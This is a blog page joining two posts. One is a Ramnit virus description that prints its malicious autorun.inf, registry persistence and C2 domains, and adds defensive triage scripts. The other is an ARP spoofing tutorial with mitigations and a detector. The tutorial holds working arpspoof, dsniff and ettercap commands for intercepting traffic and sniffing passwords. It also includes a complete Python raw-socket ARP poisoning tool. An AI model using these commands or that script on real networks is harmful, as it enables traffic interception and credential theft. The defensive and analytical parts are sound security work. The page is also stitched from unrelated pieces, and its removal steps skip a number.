Monday, March 21, 2016

VIRUS.WIN32.RAMNIT.A

by Atlantis on April 12th, 2012 in Malware Descriptions.
Detect: Virus.Win32.Ramnit.a
Platform: Win32
Type: Virus
Size: 103936 bytes
Language: C++
md5: CDF0778E1B80069D137A3E7A0C7C787F
sha1: E1826123B190C1FB3D11BBEA33EF6D1CCEABAD43
Summary
A file-infecting virus: it appends its body to executables, DLLs and HTML files on the user's PC, spreads over removable media, and installs a backdoor.
Technical Details
Spreading over Removable Storage Devices
On all removable storage devices connected to the infected computer, the virus creates the following files:
:\Recycler\S-\.cpl (3584 bytes)
:\Recycler\S-\.exe (56832 bytes)
:\Copy of Shortcut to (1).lnk (691 bytes)
:\Copy of Shortcut to (2).lnk (722 bytes)
:\Copy of Shortcut to (3).lnk (858 bytes)
:\Copy of Shortcut to (4).lnk (867 bytes)
:\autorun.inf (11964 bytes)
where the blanks in the paths stand for:
  • the drive letter of the removable device,
  • a digit identifier following "S-" (e.g.: "1-4-83-4678327503-5842818778-105234524-7024"),
  • random Latin alphabet sequences used as file names (e.g.: "xVgGwSIp", "lwTCZgQP").
The "autorun.inf" file contains a malicious script:
[autorun]
action=Open
icon=%WinDir%\system32\shell32.dll,4
shellexecute=\RECYCLER\S-\.exe
shell\explore\command=\RECYCLER\S-\.exe
USEAUTOPLAY=1
shell\Open\command=\RECYCLER\S-\.exe
The script runs each time the user opens the infected drive in Windows Explorer, provided AutoPlay is enabled, and it launches the ".exe" file. The shortcuts the malware creates are exploits for CVE-2010-2568, a flaw in the way "shell32.dll" handles shortcut (.lnk and .pif) files: Windows Explorer loads library code named by the shortcut while rendering its icon, so merely displaying the folder is enough to execute it. Here the library loaded is the ".cpl" file, which in turn launches the ".exe" file. The malware protects the files listed above from modification and recreates them in an endless loop.
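A small triage script for an autorun.inf of this shape, added here as an example (it is not from the original write-up). It parses the file, lists every entry the shell would execute when the drive is opened, and flags the tells seen above: launch targets under the hidden RECYCLER folder, an icon borrowed from shell32.dll so the entry looks like a stock shell item, and USEAUTOPLAY=1. The sample below is constructed to match the listing, using the example identifier and random name the text gives for the blanks.

```python
"""Triage an autorun.inf for the launch-on-open pattern described above.

Added example, not from the original write-up. SAMPLE is constructed from
the listing in the text; BENIGN is a constructed driver-CD style file.
"""
import re

# Keys whose value names something the shell will execute on open/explore.
LAUNCH_KEYS = {"open", "shellexecute"}
COMMAND_KEY = re.compile(r"^shell\\[^\\]+\\command$", re.IGNORECASE)


def parse_autorun(text):
    """Parse an INI-style autorun.inf into {section: {key: value}}.

    Section names and keys are lower-cased; only [autorun] matters to
    AutoPlay but every section is returned.
    """
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][key.strip().lower()] = value.strip()
    return sections


def launched_paths(autorun):
    """Every value the shell may execute for this drive (open, shellexecute,
    and any shell\\<verb>\\command entry)."""
    return [value for key, value in autorun.get("autorun", {}).items()
            if key in LAUNCH_KEYS or COMMAND_KEY.match(key)]


def triage(text):
    """Return human-readable findings for one autorun.inf; [] if nothing odd."""
    parsed = parse_autorun(text)
    auto = parsed.get("autorun", {})
    findings = []
    for path in launched_paths(parsed):
        if re.search(r"\\recycler\\", path, re.IGNORECASE):
            findings.append("launches from hidden RECYCLER folder: " + path)
        elif re.search(r"\.(exe|cpl|scr|pif|com|bat|cmd|vbs)\b", path, re.IGNORECASE):
            findings.append("launches an executable on open: " + path)
    icon = auto.get("icon", "")
    if re.search(r"shell32\.dll\s*,\s*\d+$", icon, re.IGNORECASE):
        findings.append("icon borrowed from shell32.dll (disguises the entry as a stock shell item)")
    if auto.get("useautoplay", "") == "1":
        findings.append("USEAUTOPLAY=1 asks the shell to apply AutoPlay to this medium")
    return findings


# Constructed sample mirroring the autorun.inf quoted in the write-up,
# with the example identifier and random name the text gives filled in.
SAMPLE = r"""[autorun]
action=Open
icon=%WinDir%\system32\shell32.dll,4
shellexecute=\RECYCLER\S-1-4-83-4678327503-5842818778-105234524-7024\xVgGwSIp.exe
shell\explore\command=\RECYCLER\S-1-4-83-4678327503-5842818778-105234524-7024\xVgGwSIp.exe
USEAUTOPLAY=1
shell\Open\command=\RECYCLER\S-1-4-83-4678327503-5842818778-105234524-7024\xVgGwSIp.exe
"""

# Constructed benign file: sets a label and icon, executes nothing.
BENIGN = """[autorun]
icon=setup.exe,0
label=Driver CD
"""

if __name__ == "__main__":
    for name, text in (("sample", SAMPLE), ("benign", BENIGN)):
        print(name, triage(text) or ["nothing suspicious"])
```

The parser is deliberately hand-rolled rather than configparser-based: autorun.inf keys contain backslashes and mixed case, and a triage tool should tolerate sloppy files rather than reject them.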
File Infection
The virus infects files with the following extensions:
exe
html
dll
htm
Executable files and Windows dynamic link libraries are infected by appending the virus body to the end of the last PE section of the target file and changing the entry point so that the virus code receives control first. When infecting HTM and HTML files, the following script is appended to the end of the target document:
When the infected page is opened, the script saves the virus body to the current user's temporary folder as
%Temp%\svchost.exe
and launched for execution.
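A heuristic for the appending-infector layout just described (entry point redirected into the last PE section), added here as an example and not the analyst's code. It walks PE32 headers by hand with struct, so it needs no third-party module. The two images it checks are constructed, header-only skeletons: a clean layout, and the same file after an appending infector has grown the last section, marked it executable and pointed the entry point into it.

```python
"""Flag PE files whose entry point lies in the last section.

Added example. CLEAN and INFECTED are constructed header-only PE32 images
(no section bodies), built by build_pe() below.
"""
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000


def pe_layout(data):
    """Return (entry_rva, [(name, vaddr, vsize, characteristics), ...])."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    nsections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    entry = struct.unpack_from("<I", data, opt + 16)[0]          # AddressOfEntryPoint
    sections, off = [], opt + opt_size
    for _ in range(nsections):
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, vaddr = struct.unpack_from("<II", data, off + 8)  # VirtualSize, VirtualAddress
        chars = struct.unpack_from("<I", data, off + 36)[0]      # Characteristics
        sections.append((name, vaddr, vsize, chars))
        off += 40
    return entry, sections


def infection_indicators(data):
    """Findings a triage script would report; empty for a normal layout."""
    entry, sections = pe_layout(data)
    name, vaddr, vsize, chars = sections[-1]
    findings = []
    if vaddr <= entry < vaddr + vsize:
        findings.append(f"entry point 0x{entry:x} lies in the last section ({name})")
        if chars & IMAGE_SCN_MEM_EXECUTE and not chars & IMAGE_SCN_CNT_CODE:
            findings.append(f"last section {name} is executable but not marked as code")
    return findings


def build_pe(entry, sections):
    """Constructed header-only PE32 image for testing: DOS stub, PE signature,
    COFF header, optional header, section table."""
    dos = b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", 0x40)   # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0xE0, 0x0102)
    opt = struct.pack("<HBBIIIIII", 0x10B, 0, 0, 0, 0, 0, entry, 0, 0).ljust(0xE0, b"\0")
    hdrs = b"".join(struct.pack("<8sIIIIIIHHI", n, vs, va, vs, 0, 0, 0, 0, 0, ch)
                    for n, va, vs, ch in sections)
    return dos + b"PE\0\0" + coff + opt + hdrs


# Clean: code in .text, entry point in .text, read/write data last.
CLEAN = build_pe(0x1000, [(b".text", 0x1000, 0x200, 0x60000020),
                          (b".data", 0x2000, 0x100, 0xC0000040)])
# Infected: last section grown by 0x200, made executable, entry moved into it.
INFECTED = build_pe(0x2080, [(b".text", 0x1000, 0x200, 0x60000020),
                             (b".data", 0x2000, 0x300, 0xE0000040)])

if __name__ == "__main__":
    for label, image in (("clean", CLEAN), ("infected", INFECTED)):
        print(label, infection_indicators(image) or ["no indicators"])
```

Treat a hit as a triage signal, not a verdict: some packers and self-extracting stubs also place the entry point in a late section, so confirm against a known-clean hash or the vendor's original binary before cleaning.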
Payload
Once an infected file runs, the virus decrypts and extracts the following file from its body:
%WorkDir%\Srv.exe
The extracted file is then launched. It creates and launches a copy of itself as:
%Program Files%\Microsoft\WaterMark.exe
"WaterMark.exe" then starts an instance of the "svchost.exe" system process and injects its code into it; the injected code performs the following actions:
  • Creates a mutex (a named kernel object) so that only one instance of its code runs in the system:
    Global\SYSTEM_DEMETRA_MAIN
  • Modifies a registry value so that the copy created earlier starts automatically:
    [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
    "Userinit" = "%System%\userinit.exe,,%Program files%\microsoft\watermark.exe"
    Because Userinit is started by the "winlogon.exe" process, the copy is launched even when the computer boots into Safe Mode.
  • Protects the autorun registry value and the "WaterMark.exe" file from modification.
  • Creates a configuration file to store the current settings of the malicious software:
    %System%\dmlconf.dat
  • Checks for an Internet connection by contacting:
    google.com
  • Implements a backdoor. To fetch a list of commands, it connects to the servers:
    tybdtyutjfyvetscev.com
    ervwetyrbuyouiylkdhrbt.com
    tybsyiutnrtvtybdrser.com
    Depending on the command(s) received from the operator, the backdoor can:
    - download files to the infected computer and execute them;
    - connect to another server to fetch commands.
  • The code injected into the address space of the "svchost.exe" process also carries out the functionality described in the Spreading over Removable Storage Devices and File Infection sections.
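A check for the Userinit persistence described above, added as an example (not from the write-up). It splits the Userinit value into entries and reports anything other than the system userinit.exe, tolerating the empty fields left by the stock trailing comma and by the double comma in the infected value. The two strings are constructed: the stock layout and the infected layout quoted above. read_live_userinit() is the only part that touches the registry and only works on Windows.

```python
"""Report rogue entries appended to the Winlogon Userinit value.

Added example, not from the original write-up. STOCK and INFECTED are
constructed strings; the infected one mirrors the value quoted above.
"""
STOCK_BASENAME = "userinit.exe"


def userinit_entries(value):
    """Split the comma-separated value into non-empty, unquoted entries.
    The stock value ends in a comma and the infected one contains ',,',
    so empty fields are dropped rather than reported."""
    return [e.strip().strip('"') for e in value.split(",") if e.strip()]


def is_stock_userinit(entry):
    """True for userinit.exe in the system directory, or given bare (as the
    removal step in the write-up shows it)."""
    p = entry.replace("\\", "/").lower()
    if "/" not in p:
        return p == STOCK_BASENAME
    folder, name = p.rsplit("/", 1)
    return name == STOCK_BASENAME and folder.endswith(("/system32", "%system%"))


def rogue_userinit_entries(value):
    """Every entry that is not the stock userinit.exe, in original spelling."""
    return [e for e in userinit_entries(value) if not is_stock_userinit(e)]


def read_live_userinit():
    """Read the live value on a Windows host; returns None where the winreg
    module (Windows only) is unavailable."""
    try:
        import winreg
    except ImportError:
        return None
    key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
                         r"Software\Microsoft\Windows NT\CurrentVersion\Winlogon")
    value, _ = winreg.QueryValueEx(key, "Userinit")
    return value


# Constructed values: the stock layout and the infected layout from the text.
STOCK = r"C:\Windows\system32\userinit.exe,"
INFECTED = r"%System%\userinit.exe,,%Program files%\microsoft\watermark.exe"

if __name__ == "__main__":
    live = read_live_userinit()
    for label, value in (("stock", STOCK), ("infected", INFECTED), ("live", live)):
        if value is not None:
            print(label, rogue_userinit_entries(value) or ["clean"])
```

The folder check matters as much as the file name: a second userinit.exe dropped outside system32 would pass a name-only comparison.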
Removal Recommendations
To remove the malware, proceed through the steps listed below:
  1. Run a full scan of your computer using an antivirus program with an up-to-date definition database.
  2. Do not launch EXE, HTM or HTML files and do not reboot your computer until the full scan is complete.
  3. Restore the infected files from the backup copies.
  4. Restore the registry value (How to Work with System Registry) by removing the appended "watermark.exe" entry; on a stock system the value is the system userinit.exe followed by a trailing comma:
    [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
    "Userinit" = "%System%\userinit.exe,"
  5. Delete the following files:
    :\Recycler\S-\.cpl (3584 bytes)
    :\Recycler\S-\.exe (56832 bytes)
    :\Copy of Shortcut to (1).lnk (691 bytes)
    :\Copy of Shortcut to (2).lnk (722 bytes)
    :\Copy of Shortcut to (3).lnk (858 bytes)
    :\Copy of Shortcut to (4).lnk (867 bytes)
    :\autorun.inf (11964 bytes)
    %Temp%\svchost.exe
    %WorkDir%\Srv.exe
    %Program Files%\Microsoft\WaterMark.exe
  6. Delete the original Trojan file (its file name and location depends on the way the Trojan originally penetrated a user’s computer).
  8. Clean the Temporary Internet Files folder, which may contain infected files.

ARP Spoofing using Dsniff Tools and Ettercap

A quick demonstration of ARP Spoofing using Dsniff Tools and Ettercap

     Let's start by using Dug Song's Arpspoof program that comes with his Dsniff package. I use the *nix version but if you look around you may be able to find a Win32 version. The easiest way to run Dsniff is to boot from a BackTrack boot CD. The first thing you should do is make sure packet forwarding is turned on, otherwise our machine will drop all traffic between the hosts we are trying to sniff, causing a denial of service. Some of the tools I use take care of this themselves (like Ettercap, which forwards the packets itself), but to be sure, you may want to do it yourself. Use the following commands, depending on operating system:

Linux:
echo 1 > /proc/sys/net/ipv4/ip_forward

BSD:
sysctl -w net.inet.ip.forwarding=1

     Now that your computer will forward the traffic you can start ARP Spoofing. Let's assume you want to sniff all traffic between a host and the gateway so you can see the traffic it's sending to the Internet. To get traffic in both directions you would use the following two commands:

arpspoof -t 192.168.1.1 192.168.1.2 >/dev/null 2>&1 &
arpspoof -t 192.168.1.2 192.168.1.1 >/dev/null 2>&1 &


     The ">/dev/null 2>&1 &" part backgrounds each instance and discards its output so that both can run from one terminal; you may want to omit it for debugging. Read the commands as arpspoof -t <target> <host>: the first tells the gateway (192.168.1.1) that we are 192.168.1.2, the second tells 192.168.1.2 that we are the gateway, so both directions of the conversation pass through us. Add -i <interface> if the machine has more than one. Now you can use any package you wish to sniff the connection. To start with I'd recommend using the sniffer dsniff that comes along with Arpspoof to sniff for plaintext passwords. To start sniffing with dsniff just drop out to a command shell and type:

dsniff

     As dsniff finds passwords and usernames it prints them to the screen. To look at other kinds of traffic I would recommend tcpdump or Wireshark. When you are ready to stop ARP spoofing issue the following command:

killall arpspoof

     This should kill the two instances of Arpspoof started above.
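What those two arpspoof instances put on the wire, as an added example (this is not dsniff's code). It hand-builds the ARP "is-at" replies, and when run as root on Linux sends them on the given interface every two seconds, re-ARPing the victims with the correct bindings on Ctrl-C the way arpspoof does on exit. IP forwarding still has to be enabled as above, and the MAC addresses are assumed to be supplied by the caller (read them from ip neigh or arp -a first); the values in main() are constructed placeholders.

```python
"""Build and send the ARP replies that arpspoof -t gateway host and
arpspoof -t host gateway send. Added example, not dsniff's code."""
import socket
import struct
import sys
import time

ETH_P_ARP = 0x0806
ARP_REPLY = 2


def mac_bytes(mac):
    return bytes(int(octet, 16) for octet in mac.split(":"))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet frame carrying an ARP reply that tells target_mac/target_ip
    'sender_ip is at sender_mac'. Padded to the 60-byte Ethernet minimum."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)  # htype, ptype, hlen, plen, op
    arp += mac_bytes(sender_mac) + socket.inet_aton(sender_ip)
    arp += mac_bytes(target_mac) + socket.inet_aton(target_ip)
    return (eth + arp).ljust(60, b"\0")


def parse_arp(frame):
    """Decode the fields a victim's ARP cache takes from such a frame."""
    if struct.unpack_from("!H", frame, 12)[0] != ETH_P_ARP:
        raise ValueError("not an ARP frame")
    return {
        "op": struct.unpack_from("!H", frame, 20)[0],
        "sender_mac": mac_str(frame[22:28]),
        "sender_ip": socket.inet_ntoa(frame[28:32]),
        "target_mac": mac_str(frame[32:38]),
        "target_ip": socket.inet_ntoa(frame[38:42]),
    }


def poison_frames(my_mac, gateway_ip, gateway_mac, host_ip, host_mac):
    """The two frames arpspoof alternates: the gateway hears 'host is at me',
    the host hears 'gateway is at me'."""
    return [
        build_arp_reply(my_mac, host_ip, gateway_mac, gateway_ip),   # arpspoof -t gateway host
        build_arp_reply(my_mac, gateway_ip, host_mac, host_ip),      # arpspoof -t host gateway
    ]


def restore_frames(gateway_ip, gateway_mac, host_ip, host_mac):
    """Correct replies sent on exit so the victims' caches heal (re-ARP)."""
    return [
        build_arp_reply(host_mac, host_ip, gateway_mac, gateway_ip),
        build_arp_reply(gateway_mac, gateway_ip, host_mac, host_ip),
    ]


def main(iface, my_mac, gateway_ip, gateway_mac, host_ip, host_mac, interval=2.0):
    sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW)  # Linux only, needs CAP_NET_RAW
    sock.bind((iface, 0))
    try:
        while True:
            for frame in poison_frames(my_mac, gateway_ip, gateway_mac, host_ip, host_mac):
                sock.send(frame)
            time.sleep(interval)
    except KeyboardInterrupt:
        for _ in range(3):
            for frame in restore_frames(gateway_ip, gateway_mac, host_ip, host_mac):
                sock.send(frame)
            time.sleep(1)


if __name__ == "__main__":
    # Constructed placeholder addresses; replace with values from 'ip neigh'.
    main(sys.argv[1] if len(sys.argv) > 1 else "eth0",
         "00:11:22:33:44:99", "192.168.1.1", "00:11:22:33:44:01",
         "192.168.1.2", "00:11:22:33:44:02")
```

Note that each poisoning frame is unicast to the victim rather than broadcast, and that the restore step is what keeps the victims' ARP caches from staying poisoned until their entries time out after you stop.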
    Another great tool is Ettercap, the Swiss army knife of ARP poisoning and password sniffing. I usually use it in non-interactive mode, but by default it has an ncurses interface that some may find easier to use. If you would like to use Ettercap for ARP poisoning instead, the following commands should serve as good examples. If we wanted to target all hosts on the network and sniff traffic between every node, we would use the following command:

ettercap -T -q -M arp // //

    Be careful with the above command: having all of the traffic on a large network going through one slow computer can really bog down network connections. If we had a specific victim in mind, let's say a host with the IP 192.168.1.1, we would use this command:

ettercap -T -q -M arp /192.168.1.1/ //

If 192.168.1.1 is the gateway, we should be able to see all outgoing traffic. To have Ettercap also show the connections the gateway forwards to addresses outside the LAN, rather than only LAN-to-gateway traffic, use -M arp:remote. Here is what the command line option flags do:

-T tells Ettercap to use the text interface; I like this option the best as the more GUI-like modes are rather confusing.
-q tells Ettercap to be quiet, in other words less verbose.
-M tells Ettercap the MITM (Man in the Middle) method we want to use, in this case ARP poisoning.
For some other things you can do with Ettercap check out my video Fun with Ettercap Filters: The Movie.

Other Tools

     There are many other packages I would like to mention as well. The first is Cain, which Windows users will be much more comfortable with. It has some great functionality and a nice interface, and I have a video tutorial on how to use it.
    If you like pretty GUIs, Cain is the way to go. It does not have as many options as Ettercap, but it's still pretty cool and has some other Windows-specific extras built in.
    There are also specialized sniffers for certain kinds of content. Driftnet parses out the images people are seeing as they web surf. I've not done a video on Driftnet, but I have done one on NetworkActive, which can also parse out images from web traffic.
    There are also sniffers like p0f that let you fingerprint the OS behind network traffic passively.
    And that's just the tip of the iceberg when it comes to specialized sniffers.

Mitigating Sniffing Attacks

     There are quite a few ways to mitigate sniffing attacks.

1. Avoid using insecure protocols like Basic HTTP authentication and Telnet. As a matter of fact you should sniff your own network to see what passwords the tools listed above can pick up.
2. If you have to use an insecure protocol, try tunneling it through something that encrypts the sensitive data. I have a video on SSH Dynamic Port Forwarding that shows one way to accomplish this.
3. Look into using static ARP tables between critical workstations and servers. They are more trouble to maintain but limit ARP spoofing. On managed switches, Dynamic ARP Inspection (backed by DHCP snooping) enforces the same IP-to-MAC binding at the port.
4. Run software like ARPWatch to detect changes in the MAC address associated with an IP on your network, which may point to sniffers.
5. Try running tools like Sniffdet and Sentinel to detect network cards in promiscuous mode that may be running sniffing software.
6. Have outside laptops using Wi-Fi that come into your facility use a VPN to connect to the network.
7. Lock down workstations so users can't install sniffing software or boot from a CD like Knoppix.
8. Keep public terminals on a separate LAN from the staff workstations and servers.
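A minimal ARP watcher in the spirit of item 4, added as an example (not ARPWatch's own code). It works from the (sender IP, sender MAC) pairs carried by ARP replies, the same information ARPWatch takes from the wire, and raises the two alerts the arpspoof commands above would trigger: an IP whose MAC flips, and one MAC answering for more than one IP (the attacker answers for both the gateway and the host). The reply list is constructed.

```python
"""Detect ARP spoofing from a stream of (sender_ip, sender_mac) replies.

Added example, not ARPWatch's code. REPLIES is a constructed sequence.
"""
from collections import defaultdict


def detect_arp_spoofing(replies, trusted=None):
    """Return alert strings for a sequence of (sender_ip, sender_mac) pairs.

    trusted: optional {ip: mac} of known-good bindings (seed the gateway here).
    Flip-flop: an IP's MAC changes, which is what ARPWatch reports.
    Shared MAC: one MAC answers for several IPs, the signature of the two
    arpspoof instances. Each shared set is reported once, not on every reply.
    """
    bindings = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
    ips_by_mac = defaultdict(set)
    for ip, mac in bindings.items():
        ips_by_mac[mac].add(ip)
    alerts, reported = [], set()
    for ip, mac in replies:
        mac = mac.lower()
        old = bindings.get(ip)
        if old is not None and old != mac:
            alerts.append(f"flip-flop: {ip} moved from {old} to {mac}")
        bindings[ip] = mac
        ips_by_mac[mac].add(ip)
        claimed = frozenset(ips_by_mac[mac])
        if len(claimed) > 1 and (mac, claimed) not in reported:
            reported.add((mac, claimed))
            alerts.append(f"shared MAC: {mac} answers for {sorted(claimed)}")
    return alerts


# Constructed replies: two legitimate announcements, then the attacker
# (...:99) answering for both the gateway and the host, repeated every 2 s.
REPLIES = [
    ("192.168.1.1", "00:11:22:33:44:01"),   # gateway, genuine
    ("192.168.1.2", "00:11:22:33:44:02"),   # host, genuine
    ("192.168.1.1", "00:11:22:33:44:99"),   # arpspoof -t 192.168.1.2 192.168.1.1
    ("192.168.1.2", "00:11:22:33:44:99"),   # arpspoof -t 192.168.1.1 192.168.1.2
    ("192.168.1.1", "00:11:22:33:44:99"),   # repeat: no new alert
]

if __name__ == "__main__":
    for alert in detect_arp_spoofing(REPLIES):
        print(alert)
```

Expect false positives from hosts that legitimately own several addresses (routers with VRRP or secondary IPs, hosts with aliases); seed those through trusted or maintain an allow list, and feed the function from a packet capture rather than a static list in practice.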

I hope you have found this article useful.

Further research:

ARPWatch
http://www-nrg.ee.lbl.gov/ 
